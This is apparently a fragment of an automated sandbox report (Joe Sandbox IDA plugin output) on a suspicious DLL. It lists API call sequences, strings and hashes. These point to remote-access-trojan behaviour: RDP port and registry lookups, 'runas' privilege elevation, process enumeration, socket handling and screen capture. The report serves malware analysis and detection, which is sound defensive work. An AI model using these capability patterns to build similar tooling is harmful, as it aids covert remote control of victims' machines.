                                                  • Instruction Fuzzy Hash: 6221B77AA052156AE311DB19FC41ACB77DCDFC52B0F06C42AF54886209E330E9878B95
                                                  APIs
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 10008505
                                                  • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000850C
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 10008539
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000854C
                                                  • #825.MFC42(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000859A
                                                  • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 100085BD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #825$CloseHandle$D@2@@std@@D@std@@Tidy@?$basic_string@U?$char_traits@V?$allocator@
                                                  • String ID:
                                                  • API String ID: 2070391518-0
                                                  • Opcode ID: 7d5be02d86cc8920d62cf2d17b5541d9373f0ddaeac744c5cd82ef4eaf4a695e
                                                  • Instruction ID: 37eccab93eae1f9570d16d686a1212c04e0715a42fba5b1868afdc0cba55ac79
                                                  • Opcode Fuzzy Hash: 7d5be02d86cc8920d62cf2d17b5541d9373f0ddaeac744c5cd82ef4eaf4a695e
                                                  • Instruction Fuzzy Hash: 1241ACB5600B058FD704CF68C881B96F7E4FF49750F004A2DE6AA87381EB70BA54CB81
                                                  APIs
                                                  • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009AAA
                                                  • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009ABB
                                                  • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009ACC
                                                  • #825.MFC42(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009AF5
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009B2A
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009B3D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@2@@std@@D@std@@Refcnt@?$basic_string@U?$char_traits@V?$allocator@$CloseHandle$#825
                                                  • String ID:
                                                  • API String ID: 3981934315-0
                                                  • Opcode ID: 8b2b594f4aed80e73da269208a1a90eec485e5e9e688899508e82b25adb2269c
                                                  • Instruction ID: 3f5e6c1ba8cdd1ffd5d3919399f724efa296fb395ea5f4111f29f1806b4e9a25
                                                  • Opcode Fuzzy Hash: 8b2b594f4aed80e73da269208a1a90eec485e5e9e688899508e82b25adb2269c
                                                  • Instruction Fuzzy Hash: A53182747006019FE744CF29C980996B7E9FF85790B14866DF95ACB795EB30EC40CBA0
                                                  APIs
                                                  • _snprintf.MSVCRT ref: 1002CCCF
                                                    • Part of subcall function 1002CBD0: inet_addr.WS2_32(?), ref: 1002CBDA
                                                  • recv.WS2_32(00000000,?,00000002,00000000), ref: 1002CD31
                                                  • CreateThread.KERNEL32(00000000,00000000,1002CBF0,?,00000000,?), ref: 1002CD80
                                                  • CloseHandle.KERNEL32(00000000), ref: 1002CD94
                                                  • Sleep.KERNEL32(000003E8), ref: 1002CD9D
                                                  • closesocket.WS2_32(00000000), ref: 1002CDB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateHandleSleepThread_snprintfclosesocketinet_addrrecv
                                                  • String ID:
                                                  • API String ID: 1576220768-0
                                                  • Opcode ID: 8ad320643c87d1d994209b64ff02a47034fd213ba19061fd0144fe89b068bf57
                                                  • Instruction ID: 96c894d9fd75394a03c3a3a038aab70250070bdc91babe31f0fa3587584578b1
                                                  • Opcode Fuzzy Hash: 8ad320643c87d1d994209b64ff02a47034fd213ba19061fd0144fe89b068bf57
                                                  • Instruction Fuzzy Hash: 8831AD74204355ABE320DF54DCC0FAB7BE8FB84740F504929F688932A1D775A8568BA2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: malloc$Tablefree
                                                  • String ID:
                                                  • API String ID: 2903114640-0
                                                  • Opcode ID: 86186fa1577d632ba100a165714a33ce1776c10956f63b3ae715142a8fd396b4
                                                  • Instruction ID: a9296b02b71586264760a7329d97d0c6985c525f31e5c152af02a019acfba51a
                                                  • Opcode Fuzzy Hash: 86186fa1577d632ba100a165714a33ce1776c10956f63b3ae715142a8fd396b4
                                                  • Instruction Fuzzy Hash: 8C1144736022246BD315CA1EBC81BDFB3D8FBC1661F14052AF919CB240DB25EE8586E2
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002BE71
                                                  • Process32First.KERNEL32(00000000,00000000), ref: 1002BE8B
                                                  • _strcmpi.MSVCRT ref: 1002BEA7
                                                  • Process32Next.KERNEL32(00000000,?), ref: 1002BEB6
                                                  • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 1002BEC0
                                                  • CloseHandle.KERNEL32(00000000,?,76C08400), ref: 1002BED3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32_strcmpi
                                                  • String ID:
                                                  • API String ID: 2975077063-0
                                                  • Opcode ID: f37c4a8f1e108d711664304603285570b95f9b7a6bb29a86161c82b5fdfa154d
                                                  • Instruction ID: 6ed28245b0ed33383696f76e5f749c63f4d2afb73675a39276b596060f345c94
                                                  • Opcode Fuzzy Hash: f37c4a8f1e108d711664304603285570b95f9b7a6bb29a86161c82b5fdfa154d
                                                  • Instruction Fuzzy Hash: 6F01B17A1016116EE750EB24EC80ADF73D9FB85361F854929FE5882280DB3CA91986B2
                                                  APIs
                                                  • wsprintfA.USER32 ref: 1002516A
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • lstrlenA.KERNEL32(?), ref: 10025196
                                                  • lstrlenA.KERNEL32(?), ref: 100251A2
                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
Similarity
• API ID: #823lstrlen$AddressLibraryLoadProcwsprintf
• String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
• API String ID: 2676723305-3034822107
Similarity
• API ID: getenvmallocsscanf
• String ID: %ld%c$JPEGMEM$x
• API String ID: 677315340-3402169052
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000EC48
  • Part of subcall function 1000EBE0: GetVersionExA.KERNEL32 ref: 1000EBF3
• ShellExecuteExA.SHELL32(0000003C), ref: 1000ECE7
• ExitProcess.KERNEL32 ref: 1000ECF5
Similarity
• API ID: ExecuteExitFileModuleNameProcessShellVersion
• String ID: <$runas
• API String ID: 984616556-1187129395
APIs
• FreeLibrary.KERNEL32(?,00000000,00000000,?,10006B17,00000000), ref: 10006F50
• VirtualFree.KERNEL32(5D5E5FC0,00000000,00008000,?,10006B17,00000000), ref: 10006F77
• GetProcessHeap.KERNEL32(00000000,10006B17,?,10006B17,00000000), ref: 10006F80
• HeapFree.KERNEL32(00000000), ref: 10006F87
Similarity
• API ID: Free$Heap$LibraryProcessVirtual
• String ID: Wu
• API String ID: 548792435-4083010176
APIs
• ShellExecuteExA.SHELL32 ref: 10009EC1
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 10009ED2
• CloseHandle.KERNEL32(?), ref: 10009EDD
Similarity
• API ID: CloseExecuteHandleObjectShellSingleWait
• String ID: <$@
• API String ID: 3837156514-1426351568
APIs
• LoadLibraryA.KERNEL32(KERNEL32.dll,WaitForSingleObject,?,10016C10,?,?,?,?,?,10098A80,000000FF), ref: 10010B7D
• GetProcAddress.KERNEL32(00000000), ref: 10010B84
• Sleep.KERNEL32(00000096,?,?,?,?,?,10098A80,000000FF), ref: 10010B97
Similarity
• API ID: AddressLibraryLoadProcSleep
• String ID: KERNEL32.dll$WaitForSingleObject
• API String ID: 188063004-3889371928
APIs
  • Part of subcall function 10005230: #823.MFC42 ref: 1000525B
  • Part of subcall function 10005230: #823.MFC42(?), ref: 1000526A
• lstrlenA.KERNEL32(?), ref: 1002945B
• LocalAlloc.KERNEL32(00000040,00000001), ref: 10029478
• lstrlenA.KERNEL32(?), ref: 100294B8
• LocalSize.KERNEL32(00000000), ref: 100294FC
• LocalFree.KERNEL32(00000000), ref: 1002950E
Similarity
• API ID: Local$#823lstrlen$AllocFreeSize
• String ID:
• API String ID: 933119475-0
APIs
• WaitForSingleObject.KERNEL32(?), ref: 10017309
• CloseHandle.KERNEL32(?), ref: 10017316
• #823.MFC42(00000110), ref: 1001733A
• #823.MFC42(00000110), ref: 1001736B
  • Part of subcall function 10018A50: LoadCursorA.USER32(00000000,00000000), ref: 10018B13
• #823.MFC42(00000110), ref: 10017392
Similarity
• API ID: #823$CloseCursorHandleLoadObjectSingleWait
• String ID:
• API String ID: 1032503192-0
APIs
• CreateDIBSection.GDI32(10019096,?,00000000,10019096,00000000,00000000), ref: 100192BE
• SelectObject.GDI32(?,00000000), ref: 100192CD
• BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 100192EA
• BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001930A
• DeleteObject.GDI32(?), ref: 10019332
Similarity
• API ID: Object$CreateDeleteSectionSelect
• String ID:
• API String ID: 3188413882-0
                                                  APIs
                                                  • #825.MFC42(?,?), ref: 10021631
                                                  • #825.MFC42(?), ref: 1002168E
                                                  • ??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 100216A2
                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 100216C5
                                                  • #825.MFC42(00000000), ref: 100216D0
                                                    • Part of subcall function 10022900: #825.MFC42(?,?,1012C490,?,1002162E,?), ref: 10022922
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID: #825$Lockit@std@@$??0_??1_
                                                  • String ID:
                                                  • API String ID: 3320149174-0
                                                  • Opcode ID: b95a587d895c0ab44b11dd6e45e27ddbbd99a7c568eb3c3c12ff39da7be81697
                                                  • Instruction ID: 7a8269cd3ee80eb637369a84312dbdf4993a751beb894944a50252e8918c9aaa
                                                  • Opcode Fuzzy Hash: b95a587d895c0ab44b11dd6e45e27ddbbd99a7c568eb3c3c12ff39da7be81697
                                                  • Instruction Fuzzy Hash: 6331AEB96007559FCB10DFA8E8D485EB3E9FB98750B99481DE85A83A00EB34FD04CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID: InternetOpen
                                                  • String ID: y$y
                                                  • API String ID: 2038078732-2085659379
                                                  • Opcode ID: dc452fb532a8b3440562dfce708e2233d078e41fe58a17104d6ab9b3988a5d1b
                                                  • Instruction ID: b3f128dd8a4f2f937591d2b39a566a4fd65ce5111e4adbe3f1b9da6999f925d3
                                                  • Opcode Fuzzy Hash: dc452fb532a8b3440562dfce708e2233d078e41fe58a17104d6ab9b3988a5d1b
                                                  • Instruction Fuzzy Hash: F0212C796082145BD200DB68BC95AAF77D9EBC4610F440439FD49D7341DBB5EA0982E7
                                                  APIs
                                                  • #6662.MFC42(0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468,00000000,100114A3,00000000,00000000,00000000), ref: 10011A82
                                                  • #4278.MFC42(1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468,00000000,100114A3), ref: 10011A9E
                                                  • #6883.MFC42(?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468), ref: 10011AB2
                                                  • #800.MFC42(?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468), ref: 10011AC3
                                                  • #6662.MFC42(0000005C,00000001,?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798), ref: 10011AD0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID: #6662$#4278#6883#800
                                                  • String ID:
                                                  • API String ID: 2113711092-0
                                                  • Opcode ID: 774a556c8fd2fdb14a6c748a972ff41b9b256d90f559a08a3d16b273acc7db09
                                                  • Instruction ID: f4fe6630835c94391bfcc8c2be099bdb1318b56aaed041f5013be16c963cdde2
                                                  • Opcode Fuzzy Hash: 774a556c8fd2fdb14a6c748a972ff41b9b256d90f559a08a3d16b273acc7db09
                                                  • Instruction Fuzzy Hash: A611F0363016159BDB18DE29DC45BAEBB95EF846B0F81072CF82A8B2C0DA34EC458691
                                                  APIs
                                                  • SetFilePointer.KERNEL32(?,?,00000001,00000000,?,?,00000065,1000878E,00000001,00000001,?,00000001,00000001,00000001), ref: 1000956E
                                                  • LocalAlloc.KERNEL32(00000040,00019000,?,?,00000065,1000878E), ref: 10009583
                                                  • ReadFile.KERNEL32(?,00000009,00018FF7,?,00000000,?,?,00000065,1000878E), ref: 100095B0
                                                  • LocalFree.KERNEL32(00000000,?,?,00000065,1000878E), ref: 100095CD
                                                  • LocalFree.KERNEL32(00000000,?,?,00000065,1000878E), ref: 100095E7
                                                    • Part of subcall function 10009600: CloseHandle.KERNEL32(?,00000000,100095E2,?,?,00000065,1000878E), ref: 1000960F
                                                    • Part of subcall function 10009600: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,00000001,00000000,100095E2,?,?,00000065,1000878E), ref: 1000963C
                                                    • Part of subcall function 10009600: #825.MFC42(00000001,?,?,00000065,1000878E), ref: 10009643
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID: Local$FileFree$#825AllocCloseD@2@@std@@D@std@@HandlePointerReadTidy@?$basic_string@U?$char_traits@V?$allocator@
                                                  • String ID:
                                                  • API String ID: 1358099757-0
                                                  • Opcode ID: 63df56e09b5848d09f2d368d6da1cb594e9dd00ae11557fb136ebf9b1cc4f06e
                                                  • Instruction ID: c1002f4ed646788d97939a754a35c43ee484aff7721c1be338d8eb9f0dbbf468
                                                  • Opcode Fuzzy Hash: 63df56e09b5848d09f2d368d6da1cb594e9dd00ae11557fb136ebf9b1cc4f06e
                                                  • Instruction Fuzzy Hash: 911172B63007029BE310CF69DC84B97B7E9FB88361F148A29F655C7281C730E815CB65
                                                  APIs
                                                    • Part of subcall function 10010B70: LoadLibraryA.KERNEL32(KERNEL32.dll,WaitForSingleObject,?,10016C10,?,?,?,?,?,10098A80,000000FF), ref: 10010B7D
                                                    • Part of subcall function 10010B70: GetProcAddress.KERNEL32(00000000), ref: 10010B84
                                                    • Part of subcall function 10010B70: Sleep.KERNEL32(00000096,?,?,?,?,?,10098A80,000000FF), ref: 10010B97
                                                    • Part of subcall function 10016FB0: GetDeviceCaps.GDI32(?,00000076), ref: 10016FE0
                                                    • Part of subcall function 10016FB0: GetDeviceCaps.GDI32(?,00000075), ref: 10016FF3
                                                  • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 10016CA5
                                                  • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 10016CB8
                                                  • Sleep.KERNEL32(000000C8), ref: 10016CF5
                                                    • Part of subcall function 10016640: InterlockedExchange.KERNEL32(?,00000000), ref: 1001666A
                                                    • Part of subcall function 10016640: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,10098A71,000000FF), ref: 10016675
                                                    • Part of subcall function 10016640: CloseHandle.KERNEL32(?,?,?,?,?,?,10098A71,000000FF), ref: 10016682
                                                    • Part of subcall function 10016640: #823.MFC42(000001F0), ref: 100166B0
                                                    • Part of subcall function 10016640: InterlockedExchange.KERNEL32(?,00000001), ref: 1001676D
                                                  • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 10016CD4
                                                  • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 10016CE7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID: CapsDeviceExchangeInfoInterlockedMessageParametersSendSleepSystem$#823AddressCloseHandleLibraryLoadObjectProcSingleWait
                                                  • String ID:
                                                  • API String ID: 2254935227-0
                                                  • Opcode ID: be34e79cd9df595e1d2b8075480f17057713f7290116f38b1c8fc94b4d2aef5d
                                                  • Instruction ID: e30af70989239995af6de31e114a37a8b410705a01b45ccca30f7429a886076e
                                                  • Opcode Fuzzy Hash: be34e79cd9df595e1d2b8075480f17057713f7290116f38b1c8fc94b4d2aef5d
                                                  • Instruction Fuzzy Hash: 6911E13438431969E960EB244C42FBA7786DF49B60F200139BB49AF2D3C9F0F8849568
                                                  APIs
                                                  • #823.MFC42(00000018,?,?,?,?,100215C5,100215A5,?,?,100215A5), ref: 1002245E
                                                  • ??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,100215A5), ref: 10022478
                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,100215A5), ref: 100224AA
                                                  • #825.MFC42(00000000,?,?,?,?,?,100215A5), ref: 100224B5
                                                  • #823.MFC42(00000018,?,?,?,?,?,100215A5), ref: 100224C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID: #823Lockit@std@@$#825??0_??1_
                                                  • String ID:
                                                  • API String ID: 2469163743-0
                                                  • Opcode ID: bb3b065350712678b62f89fc3cbe3aba2e79eed46fc4f618aef98a5c362d99f9
                                                  • Instruction ID: 9688acf8f76454a61f02f4685eabb48151241351a0c66602ac795b9270a01d11
                                                  • Opcode Fuzzy Hash: bb3b065350712678b62f89fc3cbe3aba2e79eed46fc4f618aef98a5c362d99f9
                                                  • Instruction Fuzzy Hash: 5A119DB1604345AFC300DF99E8C0956FBE4FF58310B55806EE18987B22D774B945CBD1
                                                  APIs
                                                  • WTSQuerySessionInformationW.WTSAPI32 ref: 10024AB4
                                                  • lstrcpyW.KERNEL32(?,00000000,00000000), ref: 10024AD4
                                                  • WTSFreeMemory.WTSAPI32(?), ref: 10024ADF
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000200,?,000000FF,00000000,00000104,00000000,00000000,?), ref: 10024B18
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 10024B2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID: lstrcpy$ByteCharFreeInformationMemoryMultiQuerySessionWide
                                                  • String ID:
                                                  • API String ID: 2394411120-0
                                                  • Opcode ID: 1b9fc8bdf879ab64dffc80c6641e543ed05e3d8dc88176b00b51a123d4ec99f8
                                                  • Instruction ID: 955f71c2f156101e58c3954c60e55afc292817027518ed639cbb0e0337d6e5ae
                                                  • Opcode Fuzzy Hash: 1b9fc8bdf879ab64dffc80c6641e543ed05e3d8dc88176b00b51a123d4ec99f8
                                                  • Instruction Fuzzy Hash: C61165751183417BE310CB58CC45FEB73E8BBC8B10F044A1CF659962C0E674A5088B62
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID: fgets$fclosefopenstrncpy
                                                  • String ID:
                                                  • API String ID: 2591305919-0
                                                  • Opcode ID: c37e7c1d6514c87696892a977815a2dda57362a8b53131c72b83328125353122
                                                  • Instruction ID: 71aea0b9be3d2363716b79664c12e5d484ebc15182e3c964ac9ce2589b14527c
                                                  • Opcode Fuzzy Hash: c37e7c1d6514c87696892a977815a2dda57362a8b53131c72b83328125353122
                                                  • Instruction Fuzzy Hash: 0501DF726002296BE301D738EDC1BDB37DCEF84715F950424FD9896250EB79DA8486A2
                                                  APIs
                                                  • #858.MFC42(-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119AB
                                                  • #6874.MFC42(0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119B4
                                                  • #6874.MFC42(0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119C5
                                                  • #6874.MFC42(00000020,0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119D6
                                                  • #800.MFC42(00000020,0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119E7
Memory Dump Source
• Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
